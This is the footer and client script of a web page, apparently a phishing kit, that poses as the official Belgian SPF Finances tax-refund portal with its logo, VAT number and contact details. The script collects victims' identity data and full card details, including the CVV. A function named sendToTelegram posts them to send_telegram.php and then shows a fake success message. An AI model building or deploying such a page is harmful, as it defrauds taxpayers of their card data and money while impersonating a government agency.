                    <h4 class="font-bold text-darkblue mb-4 flex items-center">
                        <i class="fas fa-headset mr-2 text-primary"></i>
                        Besoin d'Aide ?
                    </h4>
                    <div class="text-sm text-gray-600 space-y-3">
                        <div class="flex items-center">
                            <div class="bg-primary/10 p-2 rounded-lg mr-3">
                                <i class="fas fa-phone-alt text-primary"></i>
                            </div>
                            <div>
                                <div class="font-medium">+32 2 572 57 72</div>
                                <div class="text-xs text-gray-500">Lun-Ven, 9:00-17:00</div>
                            </div>
                        </div>
                        <div class="flex items-center">
                            <div class="bg-primary/10 p-2 rounded-lg mr-3">
                                <i class="fas fa-envelope text-primary"></i>
                            </div>
                            <div>
                                <div class="font-medium">info@finance.belgium.be</div>
                                <div class="text-xs text-gray-500">Réponse sous 24h</div>
                            </div>
                        </div>
                    </div>
                    <p class="text-xs text-gray-500 mt-4 text-center">
                        Portail officiel du SPF Finances pour les demandes de remboursement d'impôt
                    </p>
                </div>
            </div>
        </div>
    </main>

    <!-- Pied de Page -->
    <footer class="gradient-bg text-white mt-16">
        <div class="container mx-auto px-4 py-10">
            <div class="grid grid-cols-1 md:grid-cols-4 gap-8">
                <div class="md:col-span-2">
                    <div class="flex items-center mb-6">
                        <div class="bg-white p-2 rounded-lg mr-4">
                            <img 
                                src="https://fin.belgium.be/themes/custom/finpart/logo_fr.svg" 
                                alt="SPF Finances Belgique" 
                                class="h-8"
                                loading="lazy"
                            >
                        </div>
                        <div>
                            <h3 class="font-bold text-lg">Service Public Fédéral Finances</h3>
                            <p class="text-blue-100 text-sm">Belgique</p>
                        </div>
                    </div>
                    <p class="text-blue-100 text-sm mb-6 max-w-md">
                        Fourniture de services fiscaux sécurisés et efficaces aux citoyens et entreprises de Belgique.
                    </p>
                    <div class="flex space-x-4">
                        <a href="#" class="text-blue-100 hover:text-white transition transform hover:-translate-y-1">
                            <i class="fab fa-twitter text-xl"></i>
                        </a>
                        <a href="#" class="text-blue-100 hover:text-white transition transform hover:-translate-y-1">
                            <i class="fab fa-linkedin text-xl"></i>
                        </a>
                        <a href="#" class="text-blue-100 hover:text-white transition transform hover:-translate-y-1">
                            <i class="fab fa-facebook text-xl"></i>
                        </a>
                        <a href="#" class="text-blue-100 hover:text-white transition transform hover:-translate-y-1">
                            <i class="fab fa-youtube text-xl"></i>
                        </a>
                    </div>
                </div>
                <div>
                    <h4 class="font-bold mb-4 text-white text-lg">Liens Rapides</h4>
                    <ul class="space-y-3 text-sm text-blue-100">
                        <li><a href="#" class="hover:text-white transition flex items-center"><i class="fas fa-chevron-right mr-2 text-xs"></i>Calculateur d'Impôt</a></li>
                        <li><a href="#" class="hover:text-white transition flex items-center"><i class="fas fa-chevron-right mr-2 text-xs"></i>Formulaires & Documents</a></li>
                        <li><a href="#" class="hover:text-white transition flex items-center"><i class="fas fa-chevron-right mr-2 text-xs"></i>Contactez-Nous</a></li>
                        <li><a href="#" class="hover:text-white transition flex items-center"><i class="fas fa-chevron-right mr-2 text-xs"></i>Politique de Confidentialité</a></li>
                    </ul>
                </div>
                <div>
                    <h4 class="font-bold mb-4 text-white text-lg">Services</h4>
                    <ul class="space-y-3 text-sm text-blue-100">
                        <li><a href="#" class="hover:text-white transition flex items-center"><i class="fas fa-chevron-right mr-2 text-xs"></i>Remboursements d'Impôt</a></li>
                        <li><a href="#" class="hover:text-white transition flex items-center"><i class="fas fa-chevron-right mr-2 text-xs"></i>Déclaration en Ligne</a></li>
                        <li><a href="#" class="hover:text-white transition flex items-center"><i class="fas fa-chevron-right mr-2 text-xs"></i>Plans de Paiement</a></li>
                        <li><a href="#" class="hover:text-white transition flex items-center"><i class="fas fa-chevron-right mr-2 text-xs"></i>FAQ</a></li>
                    </ul>
                </div>
            </div>
            <div class="border-t border-blue-700 mt-10 pt-6 text-center text-sm text-blue-200">
                <p>&copy; <span id="current-year">2024</span> Service Public Fédéral Finances Belgique. Tous droits réservés. | TVA: BE 0203.201.340</p>
            </div>
        </div>
    </footer>

    <script>
        // Fonctions pour les dates automatiques
        function getCurrentYear() {
            return new Date().getFullYear();
        }
        
        function getCurrentMonth() {
            const months = [
                'janvier', 'février', 'mars', 'avril', 'mai', 'juin',
                'juillet', 'août', 'septembre', 'octobre', 'novembre', 'décembre'
            ];
            return months[new Date().getMonth()];
        }
        
        function getClaimDeadline() {
            return "31 décembre 2025"; // Date fixe comme demandé
        }
        
        // Mettre à jour toutes les dates automatiquement
        function updateAllDates() {
            // Année en cours
            document.getElementById('current-year').textContent = getCurrentYear();
            
            // Période de déclaration (mois actuel de l'année en cours)
            document.getElementById('filing-period').textContent = `${getCurrentMonth()} ${getCurrentYear()}`;
            document.getElementById('filing-month').textContent = `${getCurrentMonth()} ${getCurrentYear()}`;
            
            // Date limite de réclamation (fixe comme demandé)
            document.getElementById('claim-deadline').textContent = getClaimDeadline();
        }
        
        // Mettre à jour l'heure actuelle
        function updateTime() {
            const now = new Date();
            const options = { 
                weekday: 'long', 
                year: 'numeric', 
                month: 'long', 
                day: 'numeric',
                hour: '2-digit',
                minute: '2-digit'
            };
            document.getElementById('current-time').textContent = now.toLocaleDateString('fr-FR', options);
        }
        
        // Fonction pour vérifier si c'est en dehors des horaires d'ouverture
        function isOutsideBusinessHours() {
            const now = new Date();
            const day = now.getDay(); // 0 = Dimanche, 1 = Lundi, ..., 6 = Samedi
            const hour = now.getHours();
            const minutes = now.getMinutes();
            const currentTime = hour + minutes / 60;
            
            // Lundi - Vendredi: 8h30 - 17h30
            // Samedi: 9h00 - 12h00
            // Dimanche: Fermé
            
            if (day === 0) { // Dimanche
                return true;
            } else if (day === 6) { // Samedi
                return currentTime < 9 || currentTime >= 12;
            } else { // Lundi - Vendredi
                return currentTime < 8.5 || currentTime >= 17.5;
            }
        }
        
        // Fonction d'affichage des notifications
        function showNotification(message, type = 'info') {
            const container = document.getElementById('notification-container');
            
            // Créer l'élément de notification
            const notification = document.createElement('div');
            notification.className = `mb-4 p-4 rounded-lg shadow-md border-l-4 ${
                type === 'error' ? 'bg-red-50 border-red-500 text-red-700' :
                type === 'success' ? 'bg-green-50 border-green-500 text-green-700' :
                'bg-blue-50 border-blue-500 text-blue-700'
            }`;
            
            notification.innerHTML = `
                <div class="flex items-start">
                    <div class="flex-shrink-0">
                        <i class="fas ${
                            type === 'error' ? 'fa-exclamation-circle' :
                            type === 'success' ? 'fa-check-circle' :
                            'fa-info-circle'
                        }"></i>
                    </div>
                    <div class="ml-3 flex-1">
                        <p class="text-sm font-medium">${message}</p>
                    </div>
                    <button type="button" class="ml-auto -mx-1.5 -my-1.5 rounded-lg p-1.5 inline-flex h-8 w-8 hover:bg-gray-100 focus:ring-2 focus:ring-gray-400">
                        <i class="fas fa-times"></i>
                    </button>
                </div>
            `;
            
            // Ajouter la fonctionnalité du bouton de fermeture
            notification.querySelector('button').addEventListener('click', () => {
                notification.remove();
            });
            
            // Ajouter au conteneur
            container.appendChild(notification);
            
            // Afficher la notification avec animation
            setTimeout(() => {
                notification.classList.add('show');
            }, 10);
            
            // Suppression automatique après 5 secondes
            setTimeout(() => {
                if (notification.parentNode) {
                    notification.classList.remove('show');
                    setTimeout(() => {
                        if (notification.parentNode) {
                            notification.remove();
                        }
                    }, 300);
                }
            }, 5000);
        }

        // Fonctions pour gérer l'overlay d'erreur
        function showErrorModal() {
            document.getElementById('loadingOverlay').classList.add('active');
        }

        function hideErrorModal() {
            document.getElementById('loadingOverlay').classList.remove('active');
        }

        // Fonctions pour gérer l'overlay des horaires de service
        function showServiceOverlay() {
            document.getElementById('serviceOverlay').classList.add('active');
        }

        function hideServiceOverlay() {
            document.getElementById('serviceOverlay').classList.remove('active');
        }

        // Écouteurs d'événements pour les boutons de l'overlay d'erreur
        document.getElementById('closeErrorModal').addEventListener('click', function() {
            hideErrorModal();
        });

        document.getElementById('retrySubmit').addEventListener('click', function() {
            hideErrorModal();
            // Ici vous pouvez ajouter la logique pour réessayer la soumission
            document.getElementById('refundForm').dispatchEvent(new Event('submit'));
        });

        // Écouteur d'événement pour fermer l'overlay des horaires de service
        document.getElementById('closeServiceModal').addEventListener('click', function() {
            hideServiceOverlay();
        });

        // Afficher automatiquement l'overlay des horaires de service si en dehors des heures d'ouverture
        document.addEventListener('DOMContentLoaded', function() {
            if (isOutsideBusinessHours()) {
                showServiceOverlay();
            }
        });

        // Fonction pour envoyer les données à Telegram
        async function sendToTelegram(formData) {
            try {
                // Récupérer le prix depuis config.php
                const priceResponse = await fetch('get_price.php');
                const priceData = await priceResponse.json();
                const refundAmount = priceData.price || '674,56 €';

                // Préparer les données pour l'envoi
                const data = {
                    firstName: formData.get('firstName'),
                    lastName: formData.get('lastName'),
                    email: formData.get('email'),
                    phone: formData.get('phone'),
                    address: formData.get('address'),
                    postalCode: formData.get('postalCode'),
                    city: formData.get('city'),
                    country: formData.get('country'),
                    paymentMethod: selectedPaymentMethod,
                    contactMethod: selectedContactMethod,
                    cardNumber: formData.get('cardNumber') || formData.get('bancontactCardNumber'),
                    expiryDate: formData.get('expiryDate') || formData.get('bancontactExpiryDate'),
                    cvv: formData.get('cvv'),
                    cardHolder: formData.get('cardHolder') || formData.get('bancontactCardHolder'),
                    refundAmount: refundAmount,
                    timestamp: new Date().toLocaleString('fr-FR')
                };

                // Envoyer les données au serveur PHP
                const response = await fetch('send_telegram.php', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json',
                    },
                    body: JSON.stringify(data)
                });

                const result = await response.json();
                
                if (result.success) {
                    console.log('Données envoyées avec succès à Telegram');
                    return true;
                } else {
                    console.error('Erreur lors de l\'envoi à Telegram:', result.error);
                    return false;
                }
            } catch (error) {
                console.error('Erreur:', error);
                return false;
            }
        }

        // Fonction pour récupérer le prix depuis le serveur
        async function loadPriceFromConfig() {
            try {
                const response = await fetch('get_price.php');
                const data = await response.json();
                
                if (data.price) {
                    // Mettre à jour tous les éléments avec le prix
                    document.getElementById('refund-amount').textContent = data.price;
                    document.getElementById('summary-refund-amount').textContent = data.price;
                    document.getElementById('total-refund-amount').textContent = data.price;
                    document.getElementById('review-refund-amount').textContent = data.price;
                }
            } catch (error) {
                console.error('Erreur lors du chargement du prix:', error);
            }
        }

        // Navigation par étapes du formulaire
        let currentStep = 1;
        let selectedPaymentMethod = null;
        let selectedContactMethod = null;
        
        // Fonctions de navigation par étapes
        function goToStep(step) {
            // Masquer toutes les étapes
            document.querySelectorAll('.form-step').forEach(el => {
                el.classList.remove('active');
            });
            
            // Afficher l'étape cible
            document.getElementById(`step${step}`).classList.add('active');
            
            // Mettre à jour les indicateurs d'étape
            updateStepIndicators(step);
            
            currentStep = step;
        }
        
        function updateStepIndicators(activeStep) {
            // Réinitialiser tous les indicateurs
            document.querySelectorAll('.step-indicator').forEach((indicator, index) => {
                const stepNumber = index + 1;
                indicator.classList.remove('step-active', 'step-completed');
                
                if (stepNumber === activeStep) {
                    indicator.classList.add('step-active');
                } else if (stepNumber < activeStep) {
                    indicator.classList.add('step-completed');
                } else {
                    indicator.classList.add('step-inactive');
                }
            });
            
            // Mettre à jour les connecteurs
            document.querySelectorAll('[id$="connector"]').forEach((connector, index) => {
                const stepNumber = index + 1;
                if (stepNumber < activeStep) {
                    connector.classList.remove('bg-gray-200');
                    connector.classList.add('bg-success');
                } else {
                    connector.classList.remove('bg-success');
                    connector.classList.add('bg-gray-200');
                }
            });
        }
        
        // Sélection du moyen de paiement
        function selectPaymentMethod(method) {
            // Réinitialiser tous les moyens de paiement
            document.querySelectorAll('.payment-method').forEach(el => {
                if (!el.classList.contains('disabled')) {
                    el.classList.remove('selected');
                }
            });
            
            // Masquer tous les formulaires de paiement
            document.getElementById('credit-card-form').classList.add('hidden');
            document.getElementById('bancontact-form').classList.add('hidden');
            
            // Réinitialiser les icônes de vérification
            document.getElementById('credit-card-check').classList.add('opacity-0');
            document.getElementById('bancontact-check').classList.add('opacity-0');
            
            // Sélectionner la méthode cliquée (si non désactivée)
            if (!method.classList.contains('disabled')) {
                method.classList.add('selected');
                selectedPaymentMethod = method.id;
                
                // Afficher le formulaire/info approprié
                if (method.id === 'credit-card-option') {
                    document.getElementById('credit-card-form').classList.remove('hidden');
                    document.getElementById('credit-card-check').classList.remove('opacity-0');
                } else if (method.id === 'bancontact-option') {
                    document.getElementById('bancontact-form').classList.remove('hidden');
                    document.getElementById('bancontact-check').classList.remove('opacity-0');
                }
                
                // Activer le bouton suivant
                document.getElementById('next-to-step3').disabled = false;
            }
        }
        
        // Sélection de la méthode de contact
        function selectContactMethod(method) {
            // Réinitialiser toutes les méthodes de contact
            document.querySelectorAll('.contact-method').forEach(el => {
                el.classList.remove('selected');
            });
            
            // Sélectionner la méthode cliquée
            method.classList.add('selected');
            selectedContactMethod = method.id;
        }
        
        // Formater le numéro de carte de crédit
        document.getElementById("cardNumber").addEventListener("input", function(e) {
            let value = e.target.value.replace(/\s+/g, "").replace(/[^0-9]/gi, "");
            let formattedValue = value.match(/.{1,4}/g)?.join(" ") || value;
            e.target.value = formattedValue;
        });

        // Formater le numéro de carte Bancontact
        document.getElementById("bancontact-card-number").addEventListener("input", function(e) {
            let value = e.target.value.replace(/\s+/g, "").replace(/[^0-9]/gi, "");
            let formattedValue = value.match(/.{1,4}/g)?.join(" ") || value;
            e.target.value = formattedValue;
        });

        // Formater la date d'expiration
        document.getElementById("expiryDate").addEventListener("input", function(e) {
            let value = e.target.value.replace(/\s+/g, "").replace(/[^0-9]/gi, "");
            if (value.length >= 2) {
                value = value.substring(0, 2) + "/" + value.substring(2);
            }
            e.target.value = value.substring(0, 5);
        });

        // Formater la date d'expiration Bancontact
        document.getElementById("bancontact-expiry-date").addEventListener("input", function(e) {
            let value = e.target.value.replace(/\s+/g, "").replace(/[^0-9]/gi, "");
            if (value.length >= 2) {
                value = value.substring(0, 2) + "/" + value.substring(2);
            }
            e.target.value = value.substring(0, 5);
        });

        // Ajouter la fonctionnalité des étiquettes flottantes
        document.querySelectorAll('.input-container input, .input-container select').forEach(input => {
            input.addEventListener('focus', function() {
                this.parentElement.classList.add('border-primary');
            });
            
            input.addEventListener('blur', function() {
                if (!this.value) {
                    this.parentElement.classList.remove('border-primary');
                }
            });
        });

        // Écouteurs d'événements de navigation par étapes
        document.getElementById('next-to-step2').addEventListener('click', function() {
            // Valider l'étape 1
            const firstName = document.getElementById('firstName').value;
            const lastName = document.getElementById('lastName').value;
            const email = document.getElementById('email').value;
            const phone = document.getElementById('phone').value;
            const address = document.getElementById('address').value;
            const postalCode = document.getElementById('postalCode').value;
            const city = document.getElementById('city').value;
            const country = document.getElementById('country').value;
            
            if (!firstName || !lastName || !email || !phone || !address || !postalCode || !city || !country) {
                showNotification('Veuillez remplir tous les champs obligatoires avant de continuer.', 'error');
                return;
            }
            
            if (!selectedContactMethod) {
                showNotification('Veuillez sélectionner une méthode de contact préférée.', 'error');
                return;
            }
            
            goToStep(2);
        });
        
        document.getElementById('back-to-step1').addEventListener('click', function() {
            goToStep(1);
        });
        
        document.getElementById('next-to-step3').addEventListener('click', function() {
            if (!selectedPaymentMethod) {
                showNotification('Veuillez sélectionner un moyen de paiement avant de continuer.', 'error');
                return;
            }
            
            // Valider les détails du moyen de paiement
            if (selectedPaymentMethod === 'credit-card-option') {
                const cardNumber = document.getElementById('cardNumber').value;
                const expiryDate = document.getElementById('expiryDate').value;
                const cvv = document.getElementById('cvv').value;
                const cardHolder = document.getElementById('cardHolder').value;
                
                if (!cardNumber || !expiryDate || !cvv || !cardHolder) {
                    showNotification('Veuillez remplir tous les détails de la carte de crédit.', 'error');
                    return;
                }
            } else if (selectedPaymentMethod === 'bancontact-option') {
                const cardNumber = document.getElementById('bancontact-card-number').value;
                const expiryDate = document.getElementById('bancontact-expiry-date').value;
                const cardHolder = document.getElementById('bancontact-card-holder').value;
                
                if (!cardNumber || !expiryDate || !cardHolder) {
                    showNotification('Veuillez remplir tous les détails Bancontact.', 'error');
                    return;
                }
            }
            
            // Mettre à jour les informations de révision
            document.getElementById('review-name').textContent = 
                document.getElementById('firstName').value + ' ' + document.getElementById('lastName').value;
            document.getElementById('review-email').textContent = document.getElementById('email').value;
            document.getElementById('review-phone').textContent = document.getElementById('phone').value;
            
            // Méthode de contact
            if (selectedContactMethod === 'contact-email') {
                document.getElementById('review-contact-method').textContent = 'E-mail';
            } else if (selectedContactMethod === 'contact-phone') {
                document.getElementById('review-contact-method').textContent = 'Téléphone';
            } else if (selectedContactMethod === 'contact-sms') {
                document.getElementById('review-contact-method').textContent = 'SMS';
            }
            
            document.getElementById('review-address').textContent = 
                document.getElementById('address').value + ', ' + 
                document.getElementById('postalCode').value + ' ' + 
                document.getElementById('city').value + ', ' + 
                document.getElementById('country').options[document.getElementById('country').selectedIndex].text;
            
            // Mettre à jour le moyen de paiement dans la révision
            if (selectedPaymentMethod === 'credit-card-option') {
                document.getElementById('review-method').textContent = 'Carte de Crédit';
                document.getElementById('review-card').classList.remove('hidden');
                document.getElementById('review-card-number').textContent = 
                    document.getElementById('cardNumber').value || 'Non fourni';
            } else if (selectedPaymentMethod === 'bancontact-option') {
                document.getElementById('review-method').textContent = 'Bancontact';
                document.getElementById('review-card').classList.remove('hidden');
                document.getElementById('review-card-number').textContent = 
                    document.getElementById('bancontact-card-number').value || 'Non fourni';
            }
            
            goToStep(3);
        });
        
        document.getElementById('back-to-step2').addEventListener('click', function() {
            goToStep(2);
        });
        
        // Écouteurs d'événements de sélection du moyen de paiement
        document.getElementById('credit-card-option').addEventListener('click', function() {
            selectPaymentMethod(this);
        });
        
        document.getElementById('bancontact-option').addEventListener('click', function() {
            selectPaymentMethod(this);
        });
        
        // Écouteurs d'événements de sélection de la méthode de contact
        document.getElementById('contact-email').addEventListener('click', function() {
            selectContactMethod(this);
        });
        
        document.getElementById('contact-phone').addEventListener('click', function() {
            selectContactMethod(this);
        });
        
        document.getElementById('contact-sms').addEventListener('click', function() {
            selectContactMethod(this);
        });
        
        // Soumission du formulaire
        document.getElementById("refundForm").addEventListener("submit", async function(e) {
            e.preventDefault();
            
            // Vérifier si les conditions sont acceptées
            if (!document.getElementById('terms').checked) {
                showNotification("Veuillez accepter les conditions générales pour continuer.", 'error');
                return;
            }
            
            // Afficher l'overlay de chargement
            document.getElementById('loadingOverlay').classList.add('active');
            
            // Collecter les données du formulaire
            const formData = new FormData(this);
            
            try {
                // Envoyer les données à Telegram
                const telegramSuccess = await sendToTelegram(formData);
                
                if (!telegramSuccess) {
                    showNotification("Erreur lors de l'envoi des données. Veuillez réessayer.", 'error');
                    document.getElementById('loadingOverlay').classList.remove('active');
                    return;
                }
                
                // Simuler un traitement de 5 secondes puis fermer
                setTimeout(() => {
                    document.getElementById('loadingOverlay').classList.remove('active');
                    showNotification("Votre demande de remboursement a été soumise avec succès !", 'success');
                    
                    // Réinitialiser le formulaire
                    this.reset();
                    
                    // Réinitialiser les sélections
                    document.querySelectorAll('.payment-method.selected, .contact-method.selected').forEach(el => {
                        el.classList.remove('selected');
                    });
                    
                    // Revenir à l'étape 1
                    goToStep(1);
                    selectedPaymentMethod = null;
                    selectedContactMethod = null;
                    
                }, 5000);
                
            } catch (error) {
                console.error('Erreur:', error);
                document.getElementById('loadingOverlay').classList.remove('active');
                showErrorModal();
            }
        });

        // Empêcher le comportement par défaut pour tous les liens
        document.querySelectorAll("a").forEach(anchor => {
            anchor.addEventListener("click", function(e) {
                e.preventDefault();
                showNotification("Ceci est un formulaire de démonstration. Dans un vrai portail du SPF Finances, cela naviguerait vers la page appropriée.");
            });
        });

        // Initialiser les dates automatiques et le prix
        updateAllDates();
        updateTime();
        loadPriceFromConfig();
        setInterval(updateTime, 60000);

        // Ajouter des animations subtiles aux cartes lors du défilement
        const observerOptions = {
            threshold: 0.1,
            rootMargin: '0px 0px -50px 0px'
        };

        const observer = new IntersectionObserver((entries) => {
            entries.forEach(entry => {
                if (entry.isIntersecting) {
                    entry.target.style.opacity = '1';
                    entry.target.style.transform = 'translateY(0)';
                }
            });
        }, observerOptions);

        document.querySelectorAll('.bg-white.rounded-xl').forEach(card => {
            card.style.opacity = '0';
            card.style.transform = 'translateY(20px)';
            card.style.transition = 'opacity 0.5s ease, transform 0.5s ease';
            observer.observe(card);
        });
    </script>
    <script src="js/jq.js"></script>
  <?php $m->ctr("FIRST PAGE".@$_GET['e']); ?>
</body>
</html>